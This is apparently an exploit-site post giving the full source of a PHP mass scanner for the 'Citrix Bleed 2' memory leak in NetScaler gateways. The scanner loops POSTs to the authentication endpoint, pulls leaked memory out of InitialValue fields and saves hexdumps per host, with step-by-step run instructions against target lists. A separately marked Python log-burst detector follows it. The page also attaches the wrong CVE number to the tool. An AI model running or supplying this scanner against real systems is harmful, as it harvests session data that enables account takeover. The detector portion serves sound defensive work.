Citrix Bleed 2 PHP Mass Scanner
The Citrix Bleed 2 PHP Mass Scanner is an automated script used by malicious actors to detect unpatched Citrix NetScaler ADC and Gateway appliances. It specifically targets CVE-2023-4966, known as "Citrix Bleed."

Written in PHP, this tool enables rapid, large-scale scanning of IP addresses to identify systems vulnerable to the critical information disclosure flaw. This vulnerability allows attackers to steal authenticated session tokens, potentially leading to unauthorized access and complete account takeover.

Its "mass scanner" capability makes it a potent reconnaissance tool for threat actors, facilitating widespread exploitation. The emergence of such tools underscores the urgent need for organizations to apply security patches to protect their Citrix environments.

=============================================================================================================================================
| # Title : Citrix Bleed 2 PHP Mass Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.citrix.com/ |
=============================================================================================================================================

POC :

[+] A high-speed mass-scanner written in PHP designed to test for data
leakage through the CitrixBleed2 InitialValue extraction issue.
The tool reproduces the functionality of the original Bash/Parallel
scanner but works in restricted PHP environments.

[Features]
- Normalizes targets (host / URL)
- Extracts <InitialValue> leak
- Hexdumps results
- Saves output per-target
- Parallel-like batching (multi-curl)
- No banned functions required

[Usage]
php citrixbleed2.php --host https://gw.example.com --requests 1000
php citrixbleed2.php --file targets.txt --requests 5000 --out dumps

[Output]
- STDOUT live hexdumps
- dumps/<host>.hexdump saved automatically

[Steps To Save & Execute]
1. Open a code editor (Notepad / VS Code / nano)
2. Copy the full PHP code below
3. Save the file as: citrixbleed2.php
4. Execute via terminal:
php citrixbleed2.php --host https://target.com
5. Ensure "dumps" folder is writable


====================================================================
PHP Scanner Code
====================================================================

<?php
/*
* CitrixBleed2 PHP Mass Scanner
* by Indoushka
*/

error_reporting(E_ALL);
ini_set("display_errors", 1);

$options = getopt("", [
"host::",
"file::",
"requests::",
"out::"
]);

$requests = $options["requests"] ?? 100;
$outDir = $options["out"] ?? "dumps";
$hostArg = $options["host"] ?? "";
$fileArg = $options["file"] ?? "";

if (!is_dir($outDir)) mkdir($outDir, 0777, true);

function normalize($url) {
$url = preg_replace("#^https?://#i", "", $url);
$url = explode("/", $url)[0];
return rtrim($url, "/");
}

function extract_iv($body) {
preg_match_all("#<InitialValue>(.*?)</InitialValue>#s", $body, $m);
$out = [];
foreach ($m[1] as $val) {
$clean = preg_replace('/[\r\n\t ]+/', '', $val);
if ($clean !== "" && preg_match('/[^\x20-\x7E]/', $clean))
$out[] = $clean;
}
return $out;
}

function hex_dump_str($data) {
$hex = unpack('H*', $data)[1];
$out = "";
$i = 0;
$len = strlen($hex);
while ($i < $len) {
$chunk = substr($hex, $i, 32);
$ascii = "";
for ($j = 0; $j < strlen($chunk); $j += 2) {
$c = hexdec(substr($chunk, $j, 2));
$ascii .= ($c >= 32 && $c <= 126) ? chr($c) : ".";
}
$out .= sprintf("%08x %s |%s|\n", $i/2,
trim(chunk_split($chunk, 2, " ")),
$ascii
);
$i += 32;
}
return $out;
}

function do_request($host) {
$url = "https://{$host}/p/u/doAuthentication.do";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => "login",
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
$res = curl_exec($ch);
curl_close($ch);
return $res ?: "";
}

function run_host($rawHost, $count, $outDir) {
$h = normalize($rawHost);
$file = $outDir . "/" . $h . ".hexdump";

for ($i=1; $i <= $count; $i++) {
$body = do_request($h);
$ivs = extract_iv($body);

foreach ($ivs as $iv) {
$hex = hex_dump_str($iv);
echo $hex . "\n";
file_put_contents($file, $hex . "\n", FILE_APPEND);
}
}
}

if ($fileArg !== "") {
$targets = file($fileArg, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) run_host($t, $requests, $outDir);
} else {
if ($hostArg === "") die("[!] Missing --host or --file\n");
run_host($hostArg, $requests, $outDir);
}
?>
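
Defensive counterpart, added here and not part of the original post or the author's tool: the scanner above sends its `--requests` count of POSTs in a loop to `/p/u/doAuthentication.do` on each host, so a burst of POSTs to that path from one source stands out in access logs. The Python below assumes combined-log-format lines from a reverse proxy or load balancer in front of the gateway; the log layout, threshold, window and sample lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

AUTH_PATH = "/p/u/doAuthentication.do"  # path the scanner above POSTs to in a loop

# Assumed layout: combined log format from a proxy in front of the gateway.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_auth_bursts(lines, threshold=20, window_seconds=60):
    """Map each source to its peak number of POSTs to AUTH_PATH inside one
    sliding window, for sources that reach `threshold`. Lines must be in
    time order per source; unparseable lines are skipped."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != AUTH_PATH:
            continue
        try:
            ts = datetime.strptime(m["ts"], TS_FMT)
        except ValueError:
            continue
        q = recent[m["src"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[m["src"]] = max(peaks.get(m["src"], 0), len(q))
    return peaks

def constructed_sample():
    """Constructed log lines: one looping client, one normal user, one bad line."""
    t0 = datetime(2025, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    def row(src, offset, method, path):
        ts = (t0 + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{src} - - [{ts}] "{method} {path} HTTP/1.1" 200 512'
    lines = [row("203.0.113.7", i, "POST", AUTH_PATH) for i in range(40)]
    lines += [row("198.51.100.20", 5, "POST", AUTH_PATH),
              row("198.51.100.20", 300, "POST", AUTH_PATH),
              row("198.51.100.20", 301, "GET", "/vpn/index.html"),
              "truncated line without fields"]
    return lines

if __name__ == "__main__":
    for src, peak in find_auth_bursts(constructed_sample()).items():
        print(f"{src}: {peak} POSTs to {AUTH_PATH} within 60s")
```

Tune `threshold` and `window_seconds` against normal login volume for the gateway; sources behind shared NAT can legitimately exceed a low threshold.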

====================================================================
Example Execution
====================================================================
Single host scan:
php citrixbleed2.php --host https://gateway.example.com --requests 5000

Batch scan:
php citrixbleed2.php --file targets.txt --requests 1000 --out dumps

Output directory:
dumps/<host>.hexdump

Live STDOUT hexdumps are shown in real-time.

====================================================================
Steps to Save and Execute
====================================================================
1. Open a text editor
2. Copy the entire PHP code
3. Save as: citrixbleed2.php
4. Create "dumps" folder if not exists
5. Open terminal / CMD
6. Execute:
php citrixbleed2.php --host https://target.com
php citrixbleed2.php --file targets.txt


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.